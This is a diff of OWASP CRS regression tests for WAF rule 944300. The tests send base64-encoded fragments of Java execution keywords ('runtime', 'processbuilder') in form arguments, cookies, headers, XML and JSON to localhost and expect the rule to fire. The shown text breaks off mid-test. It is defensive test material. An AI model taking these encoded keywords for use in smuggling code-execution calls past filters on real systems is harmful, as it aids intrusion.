+ Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BydW50aW1l" + output: + log: + expect_ids: [944300] + - test_id: 30 desc: "Nested XML element value includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BydW50aW1l" - output: - log_contains: "id \"944300\"" - - test_title: 944300-31 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BydW50aW1l" + output: + log: + expect_ids: [944300] + - test_id: 31 desc: "Content-Type text/plain includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BydW50aW1l" - output: - log_contains: "id \"944300\"" - - test_title: 944300-32 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BydW50aW1l" + output: + log: + expect_ids: [944300] + - test_id: 32 desc: "Content-Type application/json arg value includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"BydW50aW1l\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-33 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"BydW50aW1l\"}" + output: + log: + expect_ids: [944300] + - test_id: 33 desc: "Content-Type application/json arg name includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"BydW50aW1l\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-34 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"BydW50aW1l\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 34 desc: "Argument test includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=cHJvY2Vzc2J1aWxkZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-35 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=cHJvY2Vzc2J1aWxkZXI" + output: + log: + expect_ids: [944300] + - test_id: 35 desc: "Argument name includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvY2Vzc2J1aWxkZXI=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-36 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvY2Vzc2J1aWxkZXI=test" + output: + log: + expect_ids: [944300] + - test_id: 36 desc: "Cookie test includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=cHJvY2Vzc2J1aWxkZXI - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-37 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=cHJvY2Vzc2J1aWxkZXI + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 37 desc: "Cookie name includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: cHJvY2Vzc2J1aWxkZXI=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-38 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: cHJvY2Vzc2J1aWxkZXI=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 38 desc: "Request header test includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: cHJvY2Vzc2J1aWxkZXI - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-39 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: cHJvY2Vzc2J1aWxkZXI + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 39 desc: "XML attribute value includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-40 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 40 desc: "XML element value includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvY2Vzc2J1aWxkZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-41 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvY2Vzc2J1aWxkZXI" + output: + log: + expect_ids: [944300] + - test_id: 41 desc: "Nested XML element value includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvY2Vzc2J1aWxkZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-42 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvY2Vzc2J1aWxkZXI" + output: + log: + expect_ids: [944300] + - test_id: 42 desc: "Content-Type text/plain includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=cHJvY2Vzc2J1aWxkZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-43 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=cHJvY2Vzc2J1aWxkZXI" + output: + log: + expect_ids: [944300] + - test_id: 43 desc: "Content-Type application/json arg value includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"cHJvY2Vzc2J1aWxkZXI\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-44 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"cHJvY2Vzc2J1aWxkZXI\"}" + output: + log: + expect_ids: [944300] + - test_id: 44 desc: "Content-Type application/json arg name includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"cHJvY2Vzc2J1aWxkZXI\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-45 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"cHJvY2Vzc2J1aWxkZXI\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 45 desc: "Argument test includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HByb2Nlc3NidWlsZGVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-46 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HByb2Nlc3NidWlsZGVy" + output: + log: + expect_ids: [944300] + - test_id: 46 desc: "Argument name includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb2Nlc3NidWlsZGVy=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-47 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb2Nlc3NidWlsZGVy=test" + output: + log: + expect_ids: [944300] + - test_id: 47 desc: "Cookie test includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=HByb2Nlc3NidWlsZGVy - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-48 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HByb2Nlc3NidWlsZGVy + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 48 desc: "Cookie name includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: HByb2Nlc3NidWlsZGVy=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-49 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HByb2Nlc3NidWlsZGVy=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 49 desc: "Request header test includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: HByb2Nlc3NidWlsZGVy - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-50 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HByb2Nlc3NidWlsZGVy + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 50 desc: "XML attribute value includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-51 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 51 desc: "XML element value includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb2Nlc3NidWlsZGVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-52 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb2Nlc3NidWlsZGVy" + output: + log: + expect_ids: [944300] + - test_id: 52 desc: "Nested XML element value includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb2Nlc3NidWlsZGVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-53 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb2Nlc3NidWlsZGVy" + output: + log: + expect_ids: [944300] + - test_id: 53 desc: "Content-Type text/plain includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HByb2Nlc3NidWlsZGVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-54 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HByb2Nlc3NidWlsZGVy" + output: + log: + expect_ids: [944300] + - test_id: 54 desc: "Content-Type application/json arg value includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"HByb2Nlc3NidWlsZGVy\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-55 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"HByb2Nlc3NidWlsZGVy\"}" + output: + log: + expect_ids: [944300] + - test_id: 55 desc: "Content-Type application/json arg name includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"HByb2Nlc3NidWlsZGVy\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-56 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"HByb2Nlc3NidWlsZGVy\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 56 desc: "Argument test includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Bwcm9jZXNzYnVpbGRlcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-57 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 